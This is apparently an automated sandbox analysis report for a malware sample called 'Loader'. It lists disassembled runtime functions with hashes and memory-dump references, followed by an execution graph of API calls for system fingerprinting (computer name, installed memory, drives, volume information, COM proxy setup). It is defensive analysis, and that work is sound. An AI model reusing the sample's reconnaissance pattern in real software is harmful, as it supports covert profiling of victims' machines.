                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: f8e01ee9695aa7a1621ff591ba9f891babdc44eee076efc6e0ce4a6f9d80b029
                                                                                                  • Instruction ID: ed31a868cd5321ec647d1e91ff8bc8395a42fdebdf87c4cdee71cf624081aab5
                                                                                                  • Opcode Fuzzy Hash: f8e01ee9695aa7a1621ff591ba9f891babdc44eee076efc6e0ce4a6f9d80b029
                                                                                                  • Instruction Fuzzy Hash: 97B18B75800209EFCF24DFA4D881AAEB7B5FF04310F18456AF9156B216D771DAA1CBB2
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,00DC7F77,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F22D
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D3F23F
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F261
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: fcadb86682caeb6c0b36a7c8bd516aab2436f8c4bafab8c9d886aadd38877402
                                                                                                  • Instruction ID: 19c9fd0b4ffd320f8a5de00617401f9efeb104b62fb56d3ee2ba223dfddaa6d6
                                                                                                  • Opcode Fuzzy Hash: fcadb86682caeb6c0b36a7c8bd516aab2436f8c4bafab8c9d886aadd38877402
                                                                                                  • Instruction Fuzzy Hash: 3B018B35940769EFDB059B50DC0ABAEBBB8FB44B16F040625EC11E22D0DBB49A04CAA0
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00D377F9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D37804
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D37872
                                                                                                    • Part of subcall function 00D376EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D37707
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D3781F
                                                                                                  • _Yarn.LIBCPMT ref: 00D37835
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: 0d27a0d00a7930cfde7a6aa410c99e73242167045337e3fd9f6c7c04f5b8a608
                                                                                                  • Instruction ID: 6c13d9a841796326f921d460dd9bc3019e020dc52b04ec0b0158db74c1a55451
                                                                                                  • Opcode Fuzzy Hash: 0d27a0d00a7930cfde7a6aa410c99e73242167045337e3fd9f6c7c04f5b8a608
                                                                                                  • Instruction Fuzzy Hash: 040171B5A04A109BCB19EF20D85657DBB71FF94391F180109E80297391DF74AE06CBB1
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC), ref: 00D4F6BD
                                                                                                  • GetLastError.KERNEL32(?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC,00000000,?,00D4539C), ref: 00D4F6C7
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D4F6EF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction ID: 014e889030dcf955d5b1ecae703c09737078cca3275db7b3fdf8a75ba11b6726
                                                                                                  • Opcode Fuzzy Hash: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction Fuzzy Hash: 7EE01230640305BBEB242B61DC0AB593B549B00B56F240070FD0CE41F1DBA29A5099B4
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(00DC7F77,00000000,00000000,?), ref: 00D4D7B1
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D4DA03
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D4DA49
                                                                                                  • GetLastError.KERNEL32 ref: 00D4DAEC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction ID: 82a52bb09c43c81c5781dc12d4e26a9cc18c62cee8e2d19100ddef69c7475478
                                                                                                  • Opcode Fuzzy Hash: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction Fuzzy Hash: 78D179B5D042489FCF15CFA8C881AADBBB6FF09314F28416AE856EB351D770A941CF60
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction ID: ee907328bb4045a527a5194bd8235fa823d1eaacd5f686dc4bc97bdfd0074029
                                                                                                  • Opcode Fuzzy Hash: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction Fuzzy Hash: 7951E372A052069FDB298F54D881BBAB7A9FF04311F18452DE9559B291D731ECC0CBB0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D4B5DA
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B5E1
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D4B61B
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B622
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction ID: 4d9e8ca46e5ea1e4e6b0e5e2bdac888de91c0f5c4ffdb548230135cd224fd082
                                                                                                  • Opcode Fuzzy Hash: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction Fuzzy Hash: D621F371600309AFDB20AF76CC848ABB7A9FF24374715851AF859DB251E730ED408BB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1394db3c90124d369d7110d3d514eacec3eb3a395caf2824d78f98ec2b987be8
                                                                                                  • Instruction ID: c733222f5dd0c16da3c857bcbce6202ebd6c9124cefc7be3509ce7eecc68add5
                                                                                                  • Opcode Fuzzy Hash: 1394db3c90124d369d7110d3d514eacec3eb3a395caf2824d78f98ec2b987be8
                                                                                                  • Instruction Fuzzy Hash: 5221CD3222020DAF9B21EF75CC85A6A77A8EF40364F199524F819E7650EB31EC40DBB0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D4C976
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9AE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 44db8cc4760898e10f23cd4b08335fb61ec295269ebf2fa8cc31e5efaa69f2f9
                                                                                                  • Instruction ID: 00ed6c3bb440e46fd5ff7db839c4daa1cbded31df7d52c99c7df5820ff5de686
                                                                                                  • Opcode Fuzzy Hash: 44db8cc4760898e10f23cd4b08335fb61ec295269ebf2fa8cc31e5efaa69f2f9
                                                                                                  • Instruction Fuzzy Hash: C911D2F2912B597FAB117BB66C8AC7F6E9CDE953E63550125F801E1206FE31CE0089B0
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000), ref: 00D544A7
                                                                                                  • GetLastError.KERNEL32(?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?,?,00D4D486,?), ref: 00D544B3
                                                                                                    • Part of subcall function 00D54510: CloseHandle.KERNEL32(FFFFFFFE,00D544C3,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?), ref: 00D54520
                                                                                                  • ___initconout.LIBCMT ref: 00D544C3
                                                                                                    • Part of subcall function 00D544E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D54481,00D539CC,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544F8
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: caffe0c9877745c3bded36a99341481c13ae6176bc4571a02b0d43455adf48a7
                                                                                                  • Instruction ID: 7a2fc4ff2dff6e693c59d00f70fddfda9d7121f537a97a98009db02eb751ca36
                                                                                                  • Opcode Fuzzy Hash: caffe0c9877745c3bded36a99341481c13ae6176bc4571a02b0d43455adf48a7
                                                                                                  • Instruction Fuzzy Hash: 36F0373A041324BBCF222FD5EC09A9E3F25FB493AAB054410FD18C5230D6718964DFB6
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D3F809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D4A1E5
                                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D3F809,?,?,?,00000055,?,-00000050,?,?), ref: 00D4A21C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 943130320-905460609
                                                                                                  • Opcode ID: c37c4370b50d94071e97ff93a7c44da52e249b4c3564b1895cd2db5b23e5f1bd
                                                                                                  • Instruction ID: 1aab554f6c7d445563b367c28e53439ee1ff76579cae4648e2915d3d95806ce0
                                                                                                  • Opcode Fuzzy Hash: c37c4370b50d94071e97ff93a7c44da52e249b4c3564b1895cd2db5b23e5f1bd
                                                                                                  • Instruction Fuzzy Hash: 2F510871680305ABEB25AFB8CC86BB673A8EF45700F180429F9459B181FA70ED408B77
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D45071,?,?,00000000,00000000,00000000,?), ref: 00D45195
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 2ec2d12c3f9c2bf32af6d2bef4159f6b077e0da5689661120435235509e2f7e5
                                                                                                  • Instruction ID: 647250dd837f952a57188512e90137a92c8ab21e0c01c26f942eb2b4054cd3ea
                                                                                                  • Opcode Fuzzy Hash: 2ec2d12c3f9c2bf32af6d2bef4159f6b077e0da5689661120435235509e2f7e5
                                                                                                  • Instruction Fuzzy Hash: FC41BF31900609EFCF15DF98DD81AEEBBB5FF48300F18819AF908A7216D375AA50DB65
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D44C53
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___except_validate_context_record
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                  • Opcode ID: 3e37b692289f94b2b2367cbbad17250b283c452d458dddb86ded277dc1ae8cbb
                                                                                                  • Instruction ID: a1ec42a93454d5a2e9b27863542b13ebf9d6e9a1263b7130587d37564ecdf953
                                                                                                  • Opcode Fuzzy Hash: 3e37b692289f94b2b2367cbbad17250b283c452d458dddb86ded277dc1ae8cbb
                                                                                                  • Instruction Fuzzy Hash: 3D31D172901218EBCF269F54CC85BAA7B66FF0931AB1D465AF8545A121C332CCE1DBB1

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:6.5%
                                                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                                                  Signature Coverage:46.7%
                                                                                                  Total number of Nodes:304
                                                                                                  Total number of Limit Nodes:19
                                                                                                  execution_graph 30242 43d943 30243 43d960 30242->30243 30246 43d760 LdrInitializeThunk 30243->30246 30245 43da1f 30246->30245 30385 42dc02 CoSetProxyBlanket 30386 436a01 30389 436a37 30386->30389 30387 436a80 30389->30387 30390 43d760 LdrInitializeThunk 30389->30390 30390->30389 30391 42cc80 30392 42cc8c 30391->30392 30392->30392 30393 42cce5 FreeLibrary 30392->30393 30394 42ccf2 30393->30394 30394->30394 30395 42cdd5 GetComputerNameExA 30394->30395 30396 42ce1e 30395->30396 30396->30396 30397 43d700 30398 43d745 30397->30398 30399 43d73a 30397->30399 30400 43d718 30397->30400 30401 43d726 30397->30401 30406 43bb30 30398->30406 30402 43bb10 RtlAllocateHeap 30399->30402 30400->30398 30400->30401 30404 43d72b RtlReAllocateHeap 30401->30404 30405 43d740 30402->30405 30404->30405 30407 43bb43 30406->30407 30408 43bb45 30406->30408 30407->30405 30409 43bb4a RtlFreeHeap 30408->30409 30409->30405 30247 40d6c5 30253 409710 30247->30253 30249 40d6d1 CoUninitialize 30250 40d6f0 30249->30250 30251 40dae7 CoUninitialize 30250->30251 30252 40db10 30251->30252 30254 409724 30253->30254 30254->30249 30254->30254 30255 42af45 30256 42af70 30255->30256 30256->30256 30257 42b02a GetPhysicallyInstalledSystemMemory 30256->30257 30258 42b060 30257->30258 30258->30258 30259 43db4b 30261 43da76 30259->30261 30260 43dbd3 30261->30260 30264 43d760 LdrInitializeThunk 30261->30264 30263 43dbf4 30264->30263 30410 40cf08 30412 40cf90 30410->30412 30411 40cfde 30411->30411 30415 43d760 LdrInitializeThunk 30411->30415 30412->30411 30416 43d760 LdrInitializeThunk 30412->30416 30415->30411 30416->30411 30417 40ea88 CoInitializeSecurity CoInitializeSecurity 30418 423288 30419 423290 30418->30419 30420 4232a0 RtlExpandEnvironmentStrings 30419->30420 30424 4232bf 30420->30424 30422 423579 30423 423537 GetLogicalDrives 30425 440980 LdrInitializeThunk 30423->30425 30424->30422 30424->30423 30426 440980 30424->30426 30425->30424 30427 4409a0 30426->30427 30428 440a9e 30427->30428 30430 43d760 LdrInitializeThunk 30427->30430 30428->30424 30430->30428 30431 43100d 30434 414750 30431->30434 30433 431012 CoSetProxyBlanket 30434->30433 30435 418c90 30437 418c99 30435->30437 30436 418e04 30437->30436 30438 440980 LdrInitializeThunk 30437->30438 30438->30436 30439 40d691 30442 432620 30439->30442 30443 43264e GetSystemMetrics GetSystemMetrics 30442->30443 30444 432691 30443->30444 30445 420990 30446 42099e 30445->30446 30449 4209f0 30445->30449 30446->30446 30451 420ab0 30446->30451 30448 420a6c 30448->30449 30450 41ecc0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 30448->30450 30450->30449 30452 420ac0 30451->30452 30452->30452 30453 440980 LdrInitializeThunk 30452->30453 30454 420bcf 30453->30454 30265 4386d0 30266 4386e0 30265->30266 30268 43874e 30266->30268 30274 43d760 LdrInitializeThunk 30266->30274 30269 43882e 30268->30269 30271 4387ce 30268->30271 30273 43d760 LdrInitializeThunk 30268->30273 30271->30269 30275 43d760 LdrInitializeThunk 30271->30275 30273->30271 30274->30268 30275->30269 30455 40cb18 30456 40cb30 30455->30456 30461 438890 30456->30461 30458 40cc03 30459 438890 11 API calls 30458->30459 30460 40cdb3 30459->30460 30460->30460 30462 4388c0 CoCreateInstance 30461->30462 30464 4390a2 30462->30464 30465 438bdd 30462->30465 30466 4390b2 GetVolumeInformationW 30464->30466 30465->30465 30467 438c26 SysAllocString 30465->30467 30474 4390cd 30466->30474 30468 438c51 30467->30468 30469 438c59 CoSetProxyBlanket 30468->30469 30470 43908e SysFreeString 30468->30470 